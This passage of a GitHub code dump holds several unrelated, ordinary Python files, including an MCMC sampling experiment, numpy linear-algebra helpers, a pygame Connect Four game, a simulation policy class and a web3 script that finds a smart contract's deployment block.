[\"ATL\",\"SFO\"]]))\nprint(solution([['ICN', 'A'], ['ICN', 'B'], ['B', 'ICN']]))\n#print(solution([['ICN', 'A'], ['ICN', 'A'], ['A', 'ICN'],['A','C']]))\n#print(solution([[\"ICN\", \"A\"], [\"ICN\", \"A\"], [\"A\", \"ICN\"]] ))\n#print(solution([[\"ICN\",\"BOO\"], [\"ICN\", \"COO\"], [ \"COO\", \"DOO\" ], [\"DOO\", \"COO\"], [ \"BOO\", \"DOO\"] ,[\"DOO\", \"BOO\"], [\"BOO\", \"ICN\" ], [\"COO\", \"BOO\"]] ))","repo_name":"dbswl4951/programmers","sub_path":"programmers_level3/여행경로.py","file_name":"여행경로.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14803356824","text":"\"\"\"\nReproduces the Lotka-Volterra experiment.\n\"\"\"\nimport time \nfrom numpy import zeros, nan, repeat, save, unique\nfrom copy import deepcopy\nfrom ConstrainedRWM import CRWM\nfrom HelperFunctions import compute_arviz_miness_runtime, generate_powers_of_ten\nfrom TangentialHug import THUG\nfrom Manifolds import LVManifold\nimport os\n\n\ndef generate_settings(N, δ, Ns, Bs, ϵs, seeds, n_chains=4, u1_true=True, tol=1e-15, maxiter=5000):\n \"\"\"Generates variables for the experiment.\"\"\"\n manifold = LVManifold(Ns=Ns, n_chains=n_chains, seeds=seeds)\n u0s = manifold.find_init_points_for_each_chain(u1_true=u1_true, tol=tol, maxiter=maxiter)\n print(\"Settings Ns = \", Ns, \". All rows equal? 
\", (u0s == u0s[0]).all())\n return {\n 'N': N,\n 'δ': δ,\n 'Ns': Ns,\n 'Bs': Bs,\n 'ϵs': ϵs,\n 'u0s': u0s,\n 'manifold': manifold,\n 'n_chains': n_chains,\n 'seeds': seeds,\n 'rngs': manifold.rngs\n }\n\n\ndef cc_experiment_thug(settings, α=0.0, verbose=False, safe=False):\n \"\"\"Computational Cost of THUG and C-RWM.\"\"\"\n verboseprint = print if verbose else lambda *a, **k: None\n ϵs, Bs = settings['ϵs'], settings['Bs']\n rngs = settings['rngs']\n u0s = settings['u0s']\n δ = settings['δ']\n N = settings['N']\n J = settings['manifold'].J\n n_chains = settings['n_chains']\n ESS_TABLE = zeros((len(ϵs), len(Bs)))\n AP_TABLE = zeros((len(ϵs), len(Bs)))\n for ϵ_ix, ϵ in enumerate(ϵs):\n logηϵ = settings['manifold'].generate_logpi(ϵ)\n for B_ix, B in enumerate(Bs):\n chains = []\n times = []\n avg_ap = 0.0\n for chain_ix in range(n_chains):\n start_time = time.time()\n s, a = THUG(u0s[chain_ix, :], B*δ, B, N, α, logηϵ, J, method='linear', rng=rngs[chain_ix], safe=safe)\n runtime = time.time() - start_time\n verboseprint(\"epsilon={} B={} time={} a={} uot={}\".format(ϵ, B, runtime, a.mean(), unique(s, axis=0).shape[0]))\n chains.append(s)\n times.append(runtime)\n avg_ap += (a.mean() / n_chains)\n verboseprint()\n ESS_TABLE[ϵ_ix, B_ix] = compute_arviz_miness_runtime(chains, times)\n AP_TABLE[ϵ_ix, B_ix] = avg_ap\n return ESS_TABLE, AP_TABLE\n\n\ndef cc_experiment_crwm(settings, tol=1e-11, rev_tol=1e-8, verbose=False):\n \"\"\"Same as above but for C-RWM.\"\"\"\n verboseprint = print if verbose else lambda *a, **k: None\n Bs = settings['Bs']\n u0s = settings['u0s']\n manifold = settings['manifold']\n N = settings['N']\n δ = settings['δ']\n n_chains = settings['n_chains']\n rngs = settings['rngs']\n ESS_TABLE = zeros(len(Bs))\n AP_TABLE = zeros(len(Bs))\n for B_ix, B in enumerate(Bs):\n chains = []\n times = []\n avg_ap = 0.0\n for chain_ix in range(n_chains):\n start_time = time.time()\n s, e, a = CRWM(u0s[chain_ix, :], manifold, N, δ*B, B, tol=tol, rev_tol=rev_tol, rng=rngs[chain_ix])\n runtime = time.time() - start_time\n verboseprint(\"B={} time={} a={}\".format(B, runtime, a.mean()))\n chains.append(s)\n times.append(runtime)\n avg_ap += (a.mean() / n_chains)\n ESS_TABLE[B_ix] = compute_arviz_miness_runtime(chains, times)\n AP_TABLE[B_ix] = avg_ap\n return ESS_TABLE, AP_TABLE\n\n\ndef show_only_positive_ap(cc, ap, ix):\n \"\"\"USED FOR PLOTTING ONLY ESS WHERE WE HAD POSITIVE ACCEPTANCE PROBABILITY.\"\"\"\n cc_copy = cc.copy()\n ap_copy = ap.copy()\n flag = ap_copy[:, ix] < 1e-8\n values = cc_copy[:, ix]\n values[flag] = nan\n return values\n\n\ndef show_only_positive_ap_crwm(out_cc, out_ap, ϵs, ix):\n \"\"\"Same as above but for C-RWM.\"\"\"\n cc_copy = deepcopy(out_cc.copy())\n ap_copy = deepcopy(out_ap.copy())\n flag = ap_copy < 1e-8\n cc_copy[flag] = nan\n return repeat(cc_copy[ix], len(ϵs))\n\n\nif __name__== \"__main__\":\n # Global settings\n N_CHAINS = 4\n SEED_DATA_GENERATION = 1111 # Used to generate y*\n SEEDS_FOR_CHAINS = [1122, 2233, 3344, 4455] #[6666, 7777, 8888, 9999] #[2222, 3333, 4444, 5555] # Each seed, used to find starting point of initial chain.\n Z_TRUE = (0.4, 0.005, 0.05, 0.001)\n R0 = 100\n F0 = 100\n σR = 1\n σF = 1\n EPSILONS = generate_powers_of_ten(0, -6) # [1.0, 0.1, 0.01, 0.001, 0.0001, 0.00001, 0.000001]\n BS = [1, 10, 20]\n STEP_SIZE = 0.01\n DISCRETIZATION_STEP_SIZE = 1.0\n SAFE_JACOBIAN = False\n assert len(SEEDS_FOR_CHAINS) == N_CHAINS, \"For reproducibility, you need to choose `N_CHAINS` random seeds.\"\n\n # Settings for Ns=100\n SETTINGS100 = 
generate_settings(\n N=200, \n δ=STEP_SIZE, \n Ns=100, \n Bs=BS, \n ϵs=EPSILONS, \n u1_true=False,\n tol=1e-14,\n n_chains=N_CHAINS,\n seeds=SEEDS_FOR_CHAINS\n )\n\n# # Settings for Ns=120\n# SETTINGS120 = generate_settings(\n# N=200, \n# δ=STEP_SIZE, \n# Ns=120, \n# Bs=BS, \n# ϵs=EPSILONS, \n# u1_true=False,\n# tol=1e-14,\n# n_chains=N_CHAINS,\n# seeds=SEEDS_FOR_CHAINS\n# )\n\n # Ns = 100\n # THUG00_CC_100, THUG00_AP_100 = cc_experiment_thug(SETTINGS100, 0.0, verbose=False, safe=SAFE_JACOBIAN)\n # THUG09_CC_100, THUG09_AP_100 = cc_experiment_thug(SETTINGS100, 0.9, verbose=False, safe=SAFE_JACOBIAN)\n # THUG99_CC_100, THUG99_AP_100 = cc_experiment_thug(SETTINGS100, 0.99, verbose=False, safe=SAFE_JACOBIAN)\n # CRWM_CC_100, CRWM_AP_100 = cc_experiment_crwm(SETTINGS100, tol=1e-11, verbose=False)\n # Ns = 120\n # THUG00_CC_120, THUG00_AP_120 = cc_experiment_thug(SETTINGS120, 0.0, verbose=False, safe=SAFE_JACOBIAN)\n # THUG09_CC_120, THUG09_AP_120 = cc_experiment_thug(SETTINGS120, 0.9, verbose=False, safe=SAFE_JACOBIAN)\n # THUG99_CC_120, THUG99_AP_120 = cc_experiment_thug(SETTINGS120, 0.99, verbose=False, safe=SAFE_JACOBIAN)\n # CRWM_CC_120, CRWM_AP_120 = cc_experiment_crwm(SETTINGS120, tol=1e-11, verbose=False)\n\n\n\n # Construct folder to save data\n mainfolder = \"LV_Experiment\"\n subfolder = \"_\".join([str(seed) for seed in SEEDS_FOR_CHAINS])\n folder = os.path.join(mainfolder, subfolder)\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n # Save data for Ns=100\n # save(os.path.join(folder, 'THUG00_CC_100.npy'), THUG00_CC_100)\n # save(os.path.join(folder, 'THUG00_AP_100.npy'), THUG00_AP_100)\n # save(os.path.join(folder, 'THUG09_CC_100.npy'), THUG09_CC_100)\n # save(os.path.join(folder, 'THUG09_AP_100.npy'), THUG09_AP_100)\n # save(os.path.join(folder, 'THUG99_CC_100.npy'), THUG99_CC_100)\n # save(os.path.join(folder, 'THUG99_AP_100.npy'), THUG99_AP_100)\n # save(os.path.join(folder, 'CRWM_CC_100.npy'), CRWM_CC_100)\n # save(os.path.join(folder, 'CRWM_AP_100.npy'), CRWM_AP_100)\n\n # Save data for Ns=120\n # save(os.path.join(folder, 'THUG00_CC_120.npy'), THUG00_CC_120)\n # save(os.path.join(folder, 'THUG00_AP_120.npy'), THUG00_AP_120)\n # save(os.path.join(folder, 'THUG09_CC_120.npy'), THUG09_CC_120)\n # save(os.path.join(folder, 'THUG09_AP_120.npy'), THUG09_AP_120)\n # save(os.path.join(folder, 'THUG99_CC_120.npy'), THUG99_CC_120)\n # save(os.path.join(folder, 'THUG99_AP_120.npy'), THUG99_AP_120)\n # save(os.path.join(folder, 'CRWM_CC_120.npy'), CRWM_CC_120)\n # save(os.path.join(folder, 'CRWM_AP_120.npy'), CRWM_AP_120)\n\n # Save Epsilons\n # save(os.path.join(folder, 'EPSILONS.npy'), EPSILONS)\n # save(os.path.join(folder, 'BS.npy'), BS)\n","repo_name":"MauroCE/ApproximateManifoldSamplingPaper","sub_path":"LV_Experiment.py","file_name":"LV_Experiment.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"40551116846","text":"# commandline to use:\n# pip install setuptools\n# python setup.py build\n# python setup.py install\n#\n\nfrom distutils.core import setup, Extension\n\nsource_files = ['scampmodule.cpp', 'scampmodule_packet_switch.cpp']\n\next_module_1 = Extension(\n name = 'scamp', \n sources = source_files, \n include_dirs = ['../scamp5d_interface'], \n library_dirs = ['../x64/Release/'], # for a 32-bit build, it's '../Release/'\n libraries = ['scamp5d_interface','kernel32','user32','advapi32'],\n extra_compile_args = ['/O2'],\n extra_link_args = ['/LTCG:OFF'],\n 
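# the .cpp sources listed above are built as C++\n    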
language='c++'\n )\n \nsetup(name = 'scamp', version = '1.0', author='Jianing Chen', ext_modules = [ext_module_1])\n","repo_name":"yananliusdu/scamp5d_interface","sub_path":"scamp_python_module/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"36865561222","text":"from collections.abc import Mapping\nfrom typing import Any, Optional\n\nfrom .data_model import DataModel\nfrom .immutable import ImmutableDict, json_encoder\n\n\nclass PantherEvent(ImmutableDict): # pylint: disable=R0901\n \"\"\"Panther enriched event with unified data model (udm) access.\"\"\"\n\n def __init__(self, event: Mapping, data_model: Optional[DataModel]):\n \"\"\"Create data model lookups\n\n Args:\n event: Dictionary representing the event.\n data_model: the data model used for the LogType associated with this event\n \"\"\"\n super().__init__(event)\n self.data_model = data_model\n\n def udm(self, key: str) -> Any:\n \"\"\"Converts standard data model field to logtype field\"\"\"\n if not self.data_model:\n raise Exception(\"a data model hasn't been specified\")\n # access values via standardized fields\n if key in self.data_model.paths:\n # we are dealing with a jsonpath\n json_path = self.data_model.paths.get(key)\n if json_path:\n matches = json_path.find(self._container)\n if len(matches) == 1:\n return self._ensure_immutable(matches[0].value)\n if len(matches) > 1:\n raise Exception(\n 'JSONPath [{}] in DataModel [{}], matched multiple fields.'.format(json_path, self.data_model.data_model_id)\n )\n if key in self.data_model.methods:\n # we are dealing with method\n method = self.data_model.methods.get(key)\n if callable(method):\n return self._ensure_immutable(method(self._ensure_immutable(self._container)))\n # no matches, return None by default\n return None\n\n json_encoder = json_encoder\n","repo_name":"smaniar/panther","sub_path":"internal/log_analysis/rules_engine/src/enriched_event.py","file_name":"enriched_event.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"26020043506","text":"from fileinput import FileInput\r\n\r\n\r\n# str.format\r\nname = \"Filip\"\r\nage = 37\r\nprofession = \"musician\"\r\n\r\nprint(\"Hello, I'm {}, and I'm {}. I work as a {}.\" .format(name, age, profession))\r\n\r\n# f-strings\r\nmyName = \"Marek\"\r\nmyAge = \"65\"\r\nmyProfession = \"babysitter\"\r\n\r\nprint(f\"hello, {myName}. 
You are {myAge} and you work as a {myProfession} \")\r\n","repo_name":"prokofiew/Python","sub_path":"chapter_I/24.a.placement.format.py","file_name":"24.a.placement.format.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20070357988","text":"from django.shortcuts import render\nimport os\nfrom .models import ImageSeries\nimport base64\n\n\ndef image_series_list(request):\n return render(request, 'image_series_list.html', {\n 'all_image_series': ImageSeries.objects.all(),\n })\n\ndef image_viewer(request):\n id = str(request).split(\"/\")[-1]\n id = id.split(\"'\")[0]\n\n images = os.listdir(\"media/image_dumps/\" + id)\n images.sort()\n base64_data = []\n for image in images:\n with open(\"media/image_dumps/\" + id + \"/\" + image, \"rb\") as image_file:\n data_uri = base64.b64encode(image_file.read()).decode(\"ascii\")\n base64_data.append('data:image/png;base64,{0}'.format(data_uri))\n\n return render(request, 'image_viewer.html', {\n #folder name for specific series\n \"images\":base64_data,\n \"count\": len(base64_data),\n \"start\": int(len(base64_data) / 2),\n })\n","repo_name":"doby162/dicom-viewer","sub_path":"slicer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22186699349","text":"# linear_algebra.py\n\n##############################################################################\n# Imports #\n##############################################################################\nimport numpy as np\nfrom numpy import ndarray\nfrom typing import Union, Tuple\n\n\ndef solve_linear(A: np.ndarray, b: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Solves a system of linear equations.\n\n Parameters:\n A (numpy.ndarray): Coefficient matrix.\n b (numpy.ndarray): Constant vector.\n\n Returns:\n numpy.ndarray: Solution vector.\n \"\"\"\n try:\n return np.linalg.solve(A, b)\n except np.linalg.LinAlgError:\n print(\"Error: Matrix A is singular.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for linear equation.\")\n return None\n\n\ndef solve_quadratic(a: float, b: float, c: float) -> Union[str, Tuple[float, float], float]:\n \"\"\"\n Solves a quadratic equation ax^2 + bx + c = 0.\n\n Parameters:\n a, b, c (float): Coefficients of the quadratic equation.\n\n Returns:\n Union[str, Tuple[float, float]]: Real solutions of the quadratic equation.\n \"\"\"\n disc = b ** 2 - 4 * a * c\n if disc < 0:\n return \"No real solutions\"\n elif disc == 0:\n return -b / (2 * a)\n else:\n root1 = (-b + np.sqrt(disc)) / (2 * a)\n root2 = (-b - np.sqrt(disc)) / (2 * a)\n return root1, root2\n\n\ndef add_matrices(m1: np.ndarray, m2: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Adds two matrices.\n\n Parameters:\n m1, m2 (numpy.ndarray): Matrices to be added.\n\n Returns:\n numpy.ndarray: Result of the addition.\n \"\"\"\n try:\n return np.add(m1, m2)\n except ValueError:\n print(\"Error: Matrices must have the same dimensions.\")\n return None\n\n\ndef subtract_matrices(m1: np.ndarray, m2: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Subtracts two matrices.\n\n Parameters:\n m1, m2 (numpy.ndarray): Matrices to be subtracted.\n\n Returns:\n numpy.ndarray: Result of the subtraction.\n \"\"\"\n try:\n return np.subtract(m1, m2)\n except ValueError:\n print(\"Error: Matrices must have the same dimensions.\")\n return None\n\n\ndef scalar_multiply(scalar: float, 
matrix: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Multiplies a matrix by a scalar.\n\n Parameters:\n scalar (float): Scalar to multiply the matrix by.\n matrix (numpy.ndarray): Matrix to be multiplied.\n\n Returns:\n numpy.ndarray: Result of the multiplication.\n \"\"\"\n try:\n return np.multiply(scalar, matrix)\n except ValueError:\n print(\"Error: Invalid input for scalar multiplication.\")\n return None\n\n\ndef multiply_matrices(m1: np.ndarray, m2: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Multiplies two matrices.\n\n Parameters:\n m1, m2 (numpy.ndarray): Matrices to be multiplied.\n\n Returns:\n numpy.ndarray: Result of the multiplication.\n \"\"\"\n try:\n return np.matmul(m1, m2)\n except ValueError:\n print(\"Error: Matrices are not compatible for multiplication.\")\n return None\n\n\ndef determinant(matrix: np.ndarray) -> float | None:\n \"\"\"\n Calculates the determinant of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix whose determinant is to be calculated.\n\n Returns:\n float: Determinant of the matrix.\n \"\"\"\n try:\n return np.linalg.det(matrix)\n except np.linalg.LinAlgError:\n print(\"Error: Matrix must be square.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for determinant calculation.\")\n return None\n\n\ndef is_symmetric(matrix: np.ndarray) -> bool | None:\n \"\"\"\n Checks if a matrix is symmetric.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to be checked.\n\n Returns:\n bool: True if the matrix is symmetric, False otherwise.\n \"\"\"\n try:\n return np.array_equal(matrix, matrix.T)\n except ValueError:\n print(\"Error: Invalid input for symmetry check.\")\n return None\n\n\ndef inverse(matrix: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Calculates the inverse of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to be inverted.\n\n Returns:\n numpy.ndarray: Inverse of the matrix.\n \"\"\"\n try:\n return np.linalg.inv(matrix)\n except np.linalg.LinAlgError:\n print(\"Error: Matrix must be square and invertible.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for inverse calculation.\")\n return None\n\n\ndef eigen(matrix: np.ndarray) -> Union[Tuple[np.ndarray, np.ndarray], None]:\n \"\"\"\n Calculates the eigenvalues and eigenvectors of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to calculate eigenvalues and eigenvectors of.\n\n Returns:\n Union[Tuple[np.ndarray, np.ndarray], None]: A tuple containing a numpy.ndarray of eigenvalues and a 2D\n numpy.ndarray of the corresponding eigenvectors.\n \"\"\"\n try:\n eigenvalues, eigenvectors = np.linalg.eig(matrix)\n return eigenvalues, eigenvectors\n except np.linalg.LinAlgError:\n print(\"Error: Matrix must be square.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for eigenvalue and eigenvector calculation.\")\n return None\n\n\ndef transpose(matrix: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Calculates the transpose of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to be transposed.\n\n Returns:\n numpy.ndarray: Transpose of the matrix.\n \"\"\"\n try:\n return np.transpose(matrix)\n except ValueError:\n print(\"Error: Invalid input for transpose calculation.\")\n return None\n\n\ndef trace(matrix: np.ndarray) -> ndarray | None:\n \"\"\"\n Calculates the trace of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to calculate the trace of.\n\n Returns:\n float: Trace of the matrix.\n \"\"\"\n try:\n return np.trace(matrix)\n except ValueError:\n print(\"Error: Invalid input for trace 
calculation.\")\n return None\n\n\ndef rank(matrix: np.ndarray) -> int | None:\n \"\"\"\n Calculates the rank of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to calculate the rank of.\n\n Returns:\n int: Rank of the matrix.\n \"\"\"\n try:\n return np.linalg.matrix_rank(matrix)\n except ValueError:\n print(\"Error: Invalid input for rank calculation.\")\n return None\n","repo_name":"NitBuk/Wolfram-Beta","sub_path":"linear_algebra.py","file_name":"linear_algebra.py","file_ext":"py","file_size_in_byte":6474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14714616483","text":"import pygame\n\nfrom Computer import SimpleComputer\nfrom Game import Game\nfrom Board import Board\n\nclass Gui:\n def __init__(self,game):\n self._game = game\n self._x = 40\n self._y = 120\n self._run = True\n \n def start(self):\n pygame.init()\n\n pygame.display.set_caption(\"Connect 4\")\n win = pygame.display.set_mode((560,560))\n font = pygame.font.SysFont(\"Monospace\",75) \n\n while self._run == True:\n pygame.time.delay(100)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._run = False\n if event.type == pygame.MOUSEMOTION:\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n circleX = event.pos[0]\n pygame.draw.circle(win,(255,255,0),(circleX,40),35,35)\n if event.type == pygame.MOUSEBUTTONDOWN:\n x = event.pos[0]\n x = x// 80 + 1\n self._game.playerMove(x,1)\n if self._game._board.isWin() == True:\n #print(\"You win!\")\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n label = font.render(\"You Win!\",1,(255,255,0))\n win.blit(label,(40,10))\n self._run = False\n break\n self._game.computerMove(-1)\n if self._game._board.isWin() == True:\n #print(\"You lose!\")\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n label = font.render(\"You lose!\",1,(255,255,0))\n win.blit(label,(40,10))\n self._run = False\n break\n if self._game._board.isTie() == True:\n #print(\"It's a draw!\")\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n label = font.render(\"Draw!\",1,(255,255,0))\n win.blit(label,(40,10)) \n self._run = False\n break\n \n pygame.draw.rect(win,(0,0,255),(0,80,560,480))\n\n for position in range(0,42):\n posX = 40 + 80*(position % 7) \n posY = 120 + 80*(position // 7)\n\n if self._game._board._data[position] == 0:\n pygame.draw.circle(win,(0,0,0),(posX,posY),35,35)\n elif self._game._board._data[position] == 1:\n pygame.draw.circle(win,(255,255,0),(posX,posY),35,35)\n else:\n pygame.draw.circle(win,(255,0,0),(posX,posY),35,35) \n \n pygame.display.update() \n\n if self._run == False:\n pygame.time.wait(3000) \n \n pygame.quit() \n\nb = Board()\nc = SimpleComputer(b)\ng = Game(b,c)\ng = Gui(g)\ng.start()\n","repo_name":"DaridaRazvan/Connect-Four","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11927964638","text":"start = int(input())\r\nend = int(input())\r\nmagic_number = int(input())\r\ncounter = 0\r\nfound = False\r\n\r\nfor n1 in range(start, end+1):\r\n for n2 in range(start, end+1):\r\n counter += 1\r\n if not found and n1 + n2 == magic_number:\r\n found = True\r\n print(f\"Combination N:{counter} ({n1} + {n2} = {magic_number})\")\r\n\r\n\r\nif not found:\r\n print(f\"{counter} combinations - neither equals {magic_number}\")","repo_name":"bgivsto/SoftUni","sub_path":"Programming Basics with Python - септември 2022/11.Nested Loops - Lab/04.Sum of Two 
Numbers.py","file_name":"04.Sum of Two Numbers.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3923000840","text":"\"\"\"\n\tpolicy force policy\n\"\"\"\nfrom simulation.base import SimulationCategory, PolicyBase, Effect\n\n\nclass PoliceForcePolicy(PolicyBase):\n\t\"\"\"\n\t\tpolicy force policy\n\t\"\"\"\n\t\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"Police Force\",\n\t\t\t\"Every government needs to employ a police force to ensure order is kept and laws are obeyed, \"\n\t\t\t\"but it's a matter of debate exactly how much should be spent on the police. Some favor a \"\n\t\t\t\"large force with police on every street corner, other prefer a more low-key and tolerant \"\n\t\t\t\"approach.\",\n\t\t\tcategory=SimulationCategory.law_and_order,\n\t\t\tslider=['NONE',\t'LOW', 'MEDIUM', 'HIGH', 'MAXIMUM'],\n\t\t\tcan_be_cancelled=False,\n\t\t\tintroduce=25, # in political capital\n\t\t\tcancel=37, # in political capital\n\t\t\traise_cost=4, # in political capital\n\t\t\tlower_cost=18, # in political capital\n\t\t\tmin_cost=300,\n\t\t\tmax_cost=2320,\n\t\t\timplementation=6,\n\t\t\tmin_income=0,\n\t\t\tmax_income=0\n\t\t)\n\t\t\n\t\tself.cost_multiplier = [] # _default_,1.0;Wages,-0.1+(0.2*x)\n\t\t\n\t\t# https://github.com/Thalassicus/Democracy-3/blob/d7d51b848675cae9d6a7a193e040b2f01a83d463/data/missions/germany/germany.txt\n\t\tself.slider_value = 'HIGH'\n\t\tself.value = 0.8\n\n\t\t# connections:\n\t\tself.effects.append(Effect('crime_rate', '-0.35 * (x ** 0.6)', 4))\n\t\tself.effects.append(Effect('violent_crime_rate', '-0.52 * (x ** 0.6)', 3))\n\t\t# DrugCrimeRate,0-(0.1*x),3\n\t\tself.effects.append(Effect('conservatives_mood', '-0.2 + (0.48 * x)'))\n\t\tself.effects.append(Effect('state_employees_mood', '-0.15 + (0.37 * x)'))\n\t\tself.effects.append(Effect('state_employees_freq', '-0.05 + (0.1 * x)'))\n\t\t# state_employees_income,-0.3+(0.09*x)\n\t\tself.effects.append(Effect('unemployment', '0 - (0.03 * x)'))\n\t\tself.effects.append(Effect('alcoholism', '0 - (0.6 * x) '))\n\t\tself.effects.append(Effect('street_gangs', '0-(0.17*x)', 4))\n","repo_name":"mrommel/SmartPopulation","sub_path":"simulation/policies/policy_force.py","file_name":"policy_force.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10882065740","text":"#!/usr/bin/env python\n\nimport argparse\nimport re\nimport pprint\nimport math\nfrom web3 import Web3, HTTPProvider\n\ndef main():\n\n DEBUG = False \n parser = argparse.ArgumentParser()\n parser.add_argument(\"contract_address\", help=\"the address of the contract you want to examine\")\n parser.add_argument(\"web3_host\", help=\"host domain you want to examine (ex: https://ropsten.infura.io/v3/f54e8e6ea8e73724b81518b6d5c31a07)\")\n args = parser.parse_args()\n\n contract_address = args.contract_address\n web3_host = args.web3_host\n\n #verify args\n acceptable_address = re.compile('^0x\\w{40}$')\n if not acceptable_address.match(contract_address):\n print(\" contract_address is not in the correct format -- it should start with '0x' followed by 40 alphanumeric characters.\")\n \n acceptable_host = re.compile('^http')\n if not acceptable_host.match(web3_host):\n print(\" web3_host is not in the correct format -- it should start with 'http' and provide a URL and API key\")\n\n # web3.py instance\n w3 = Web3(HTTPProvider(web3_host))\n\n try:\n 
shortest = w3.eth.getBlock('earliest')['number']\n    except:\n        print(\"\\nOops. It looks like you aren't authorized to use the Web3 host URL you provided. Please double-check your URL.\\n\")\n        return  # bail out here -- 'shortest' is undefined if the call above failed\n\n    tallest = w3.eth.getBlock('latest')['number']\n\n    block_nbr = find_block_nbr( shortest, tallest, contract_address, w3 )\n    if DEBUG: print(\"The contract was deployed in Block number: \", block_nbr) \n\n    if DEBUG: print(\"Contract Address: \", contract_address)\n    block = w3.eth.getBlock( block_nbr )\n    transactions = block['transactions']\n\n    if DEBUG: print(\"Looping through transactions\")\n    for elem in transactions:\n        transaction = w3.eth.getTransactionReceipt(elem)\n\n        if transaction['contractAddress'] == contract_address:\n            print('Block Hash: ', end='', flush=True)\n            pprint.pprint(transaction['blockHash'])\n            print('Transaction Hash: ', end='', flush=True)\n            pprint.pprint(transaction['transactionHash'])\n\n\ndef round_up(val):\n\n    \"\"\"\n    .. function:: round_up(val)\n    Rounds *val* to the nearest integer. .5 is always rounded up.\n\n    round_up() always rounds .5 up to the nearest integer. This was the default behavior of the round() function before Python 3.\n    In Python 3: \"Exact halfway cases are now rounded to the nearest even result instead of away from zero. (For example, round(2.5) \n    now returns 2 rather than 3.)\" (source: https://docs.python.org/3/whatsnew/3.0.html)\n\n    Python 3's round() behavior would have given us inconsistent results in find_block_nbr()\n    \"\"\"\n\n    if (float(val) % 1) >= 0.5:\n        x = math.ceil(val)\n    else:\n        x = round(val)\n\n    return x\n\ndef find_block_nbr( shortest, tallest, contract_address, w3):\n\n    \"\"\"\n    .. function:: find_block_nbr(shortest, tallest, contract_address, w3)\n    Returns the block number in which a smart contract was deployed\n\n    find_block_nbr() finds the block at which the smart contract identified by the contract_address was deployed\n    We find this by calling web3.eth.getCode(), which has an optional block_identifier param which specifies the block height\n    If getCode() returns: Hexcode(0x) then we know that the block height is too short -- the contract was deployed in a later block\n    We then choose a new block height halfway between the tallest and shortest block heights that we have tested to see whether \n    the contract had been deployed before this new block\n\n    We're looking for the shortest and tallest block heights where the block heights are only separated by a single block, and\n    at which eth.getCode() returns None for the shorter block height and bytecode for the taller block height. When we find \n    that point, the taller block height will be the block number at which the contract was deployed.\n    \"\"\"\n\n    if tallest - shortest == 1:\n        return tallest\n\n    else:\n        halfway = int(round_up(((tallest-shortest)/2)))\n        block_height = shortest + halfway\n        bytecode = w3.eth.getCode(contract_address,block_height)\n\n        #block_height is too short -- update shortest\n        if bytecode == b'':\n            shortest = block_height\n\n        #block_height is too tall -- update tallest\n        else: \n            tallest = block_height \n\n        return find_block_nbr(shortest, tallest, contract_address, w3)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"cbrooks42/which-block","sub_path":"which_block.py","file_name":"which_block.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37866346125","text":"# The turtle begins in the center of the screen.\n# Flip a coin. 
